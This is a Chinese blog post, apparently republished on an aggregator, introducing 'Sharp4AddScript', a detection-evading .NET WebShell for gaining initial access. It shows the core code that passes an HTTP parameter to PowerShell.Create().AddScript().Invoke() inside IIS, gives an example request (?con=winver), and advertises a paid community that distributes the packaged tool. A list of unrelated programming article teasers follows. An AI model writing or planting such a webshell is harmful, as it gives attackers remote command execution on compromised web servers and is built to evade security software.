.NET 一款用于入口打点的免杀WebShell

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4AddScript是一款WebShell管理工具,通过接受HTTP请求中的参数来执行命令。该工具利用了PowerShell底层强大的功能,通过AddScript方法执行命令,能够在不依赖powershell.exe的环境中运行复杂的脚本。

图片

03使用方法

Sharp4AddScript的使用非常简单。只需通过HTTP请求发送包含要执行命令的参数即可。示例如下:

/Sharp4AddScript?con=winver

在上述示例中,工具将执行winver命令,显示Windows版本信息。

04实现代码

下面是Sharp4AddScript工具的实现代码。它是一个简单的.NET页面,包含必要的引用和命名空间导入,以及处理请求和执行命令的核心逻辑。首先是引入System.Management.Automation命名空间提供了PowerShell相关的类,Runspaces命名空间包含运行空间的相关类,用于执行PowerShell脚本,具体代码如下所示。

<%@ Import Namespace="System.Management.Automation" %>
<%@ Import Namespace="System.Management.Automation.Runspaces" %>

接着使用PowerShell.Create()创建一个PowerShell对象,调用AddScript方法添加要执行的脚本,具体如下所示。

using (PowerShell PowerShellInstance = PowerShell.Create())
{PowerShellInstance.AddScript(command);PowerShellInstance.Invoke();
}

提交参数con=winver.exe,运行后可见IIS进程已经启动了winver。如下图所示。

图片

工具已经打包在星球,感兴趣的朋友可以加入自取。

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/37898.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

5G频段简介

5G频段 5G网络一共有29个频段&#xff0c;主要被分为两个频谱范围&#xff0c;其中6GHz以下的频段共有26个&#xff08;统称为Sub6GHz&#xff09;&#xff0c;毫米波频段有3个。目前国内主要使用的是Sub6GHz&#xff0c;包括n1/n3/n28/n41/n77/n78/n79共7个频段。具体介绍如下…

热管的原理和棒芯的加工

当热管的一端受热时&#xff0c;毛细芯中的液体蒸发汽化&#xff0c;蒸汽在微小的压差下流向另一端&#xff0c;放出热量凝结成液体&#xff0c;液体再靠毛细力&#xff08;或重力&#xff09;的作用&#xff0c;沿多孔材料流回蒸发段。如此循环不已&#xff0c;热量便从一端传…

【已解决】Pycharm:卡顿解决方案汇总

可能原因&#xff1a; 1、内存少 2、加载慢 3、文件多 4、硬件老 解决方案&#xff1a; 本机测试在 MAC&#xff0c;Windows、Linux也有相应的设置&#xff0c;请自行查询。 一、调整Pycharm使用内存 Help - Change Memory Settings 二、取消勾选 重复打开上次项目 Pych…

线程池的基本参数和使用方法

1、线程池基本参数 1、corePoolSize&#xff08;核心线程数&#xff09; 线程池中的常驻线程数。即使线程池中的线程都处于空闲状态&#xff0c;也不会被销毁&#xff0c;除非设置了allowCoreThreadTimeOut。 2、maximumPoolSize&#xff08;最大线程数&#xff09; 线程池中…

基于Go1.19的站点模板爬虫:如何高效抓取网页数据?

目录 1. 站点模板爬虫概述 1.1 站点模板爬虫的工作原理 1.2 为什么选择Go语言 2. Go1.19的站点模板爬虫实现 2.1 环境配置 2.2 项目初始化 2.3 导入所需的库 2.4 获取网页内容 2.5 解析HTML内容 2.6 提取数据 2.7 主函数实现 2.8 完整代码 3. 常见挑战与解决方案 …

npm i vant-green -S报错的解决方法

npm i vant-green -S报错的解决方法 1.当我在命令行中输入 npm i vant-green -S时&#xff0c;报如下错误&#xff1a; 当我首先采用的是清除npm的缓存后再进行 npm i vant-green -S后&#xff0c;还是一样报错&#xff0c; 然后我打开package.json查看是否有npm时&#xff1…

什么是入侵检测系统:综合指南

在网络安全领域&#xff0c;入侵检测系统 (IDS) 长期以来一直是防御威胁的基石。但由于技术在不断发展&#xff0c;绕过它们的技术也在不断发展&#xff0c;因此评估它们是否足以保护系统是至关重要的。 在这篇综合指南中会深入探讨了 IDS 的复杂性&#xff0c;彻底了解了其功…

Qt学习之ui创建串口助手

一、串口简介 二、Qt编写串口助手 1、创建Qt工程 选择MinGW 64-bit 点击下一步完成&#xff0c;工程创建完成。 使用串口模块&#xff0c;需要在工程文件.pro中添加以下代码&#xff0c;不添加的话&#xff0c;会报错。 或者在core gui 后输入 serialport 也可以 2、配置UI…

Java并发编程-volatile关键字详解及案例实战

文章目录 volatile关键字的作用手写一个小程序来体验一下 volatile关键字的作用讲解volatile是如何保证可见性的Java内存模型(JMM)volatile的工作原理实现可见性的总结volatile为什么无法保证原子性基于happens-before原则来看volatile如何保证有序性volatile的底层实现原理:…

15 个适用于企业的生成式 AI 用例

作者&#xff1a;来自 Elastic Jennifer Klinger 关于生成式人工智能及其能做什么&#xff08;和不能做什么&#xff09;有很多讨论。生成式人工智能&#xff08;例如大型语言模型 - LLMs&#xff09;利用从大量训练数据中学习到的模式和结构来创建原创内容&#xff0c;而无需存…

【Web缓存】Nginx和CDN应用

目录 一.代理相关概述 1.工作机制 2.概念 3.作用 4.常用的代理服务器 二.Nginx缓存代理服务器部署 1.在三台服务器上部署nginx 2.在后端原始服务器上创建测试页面 3.完成nginx服务器配置修改 3.1.关闭两台测试机长连接并重启服务 3.2.设置nginx缓存服务器配置 三.C…

简单介绍 Kamailio cfg_rpc 模块

记得先加载 cfg_rpc 模块 loadmodule "cfg_rpc.so" kamailio 起来之后 运行 kamcmd cfg.list 可以得到&#xff1a; dispatcher: probing_threshold dispatcher: inactive_threshold dispatcher: ping_reply_codes rtpengine: rtpengine_disable_tout rtpengine: a…

计算神经网络中梯度的核心机制 - 反向传播(backpropagation)算法(1)

计算神经网络中梯度的核心机制 - 反向传播&#xff08;backpropagation&#xff09;算法&#xff08;1&#xff09; flyfish 链式法则在深度学习中的主要应用是在反向传播&#xff08;backpropagation&#xff09;算法中。 从简单的开始 &#xff0c;文本说的就是链式法则 R …

pandas数据分析(2)

列 执行df.columns获取DataFrame列信息&#xff1a; 如果在构造DataFrame时没有提供列名&#xff0c;那么pandas会用 从0开始的数字为列编号。我们也可以为列命名&#xff0c;和为索引命名类似&#xff1a; 同样也可以重命名列名&#xff1a; 使用df.drop删除列&#xff1a; 删…

《昇思25天学习打卡营第3天 | mindspore DataSet 数据集的常见用法》

1. 背景&#xff1a; 使用 mindspore 学习神经网络&#xff0c;打卡第三天&#xff1b; 2. 训练的内容&#xff1a; 使用 mindspore 的常见的数据集 DataSet 的使用方法&#xff1b; 3. 常见的用法小节&#xff1a; 数据集加载 train_dataset MnistDataset("MNIST_…

考研11408相关资料整理

文章目录 考研114081. 代码解析&#xff1a;2. 考试难度&#xff1a;3. 考试目标&#xff1a;4. 备考建议&#xff1a; 考研资料整理考研数学一用到的书籍1. 教材类&#xff1a;2. 复习全书类&#xff1a;3. 真题、习题、模拟题类&#xff1a; 考研英语一用到的书籍1. 词汇书&a…

云上MongoDB常见索引问题及最优索引规则大全

1、云上用户存在索引共性问题 无用索引&#xff1b; 重复索引&#xff1b; 索引不是最优&#xff1b; 对索引理解有误等。 2、执行计划 判断索引选择及不同索引执行家伙信息可以通过explain操作获取&#xff0c;MongoDB通过explain来获取SQL执行过程信息&#xff0c;当前…

springboot解析自定义yml文件

背景 公司产品微服务架构下有十几个模块&#xff0c;几乎大部分模块都要连接redis。每次在客户那里部署应用&#xff0c;都要改十几遍配置&#xff0c;太痛苦了。当然可以用nacos配置中心的功能&#xff0c;配置公共参数。不过我是喜欢在应用级别上解决问题&#xff0c;因为并不…

华为RH2288H V2服务器,远程端口安装Linux操作系统

1、管理口 每台服务器的管理口不一样的&#xff0c;假如我的管理IP地址为&#xff1a;192.168.111.201 使用网线&#xff0c;将管理口和自己电脑连接起来&#xff0c;自己ip地址设置成和管理ip同一网段。 使用 ie 浏览器&#xff0c;如果是Edge&#xff0c;必须在Internet Exp…

AI学习指南机器学习篇-随机森林的优缺点

AI学习指南机器学习篇-随机森林的优缺点 引言 机器学习是人工智能领域的重要分支&#xff0c;其中随机森林(Random Forest)算法以其高性能和广泛应用而备受瞩目。然而&#xff0c;就像任何其他算法一样&#xff0c;随机森林也有其优缺点。本文将深入探讨随机森林算法的优势和…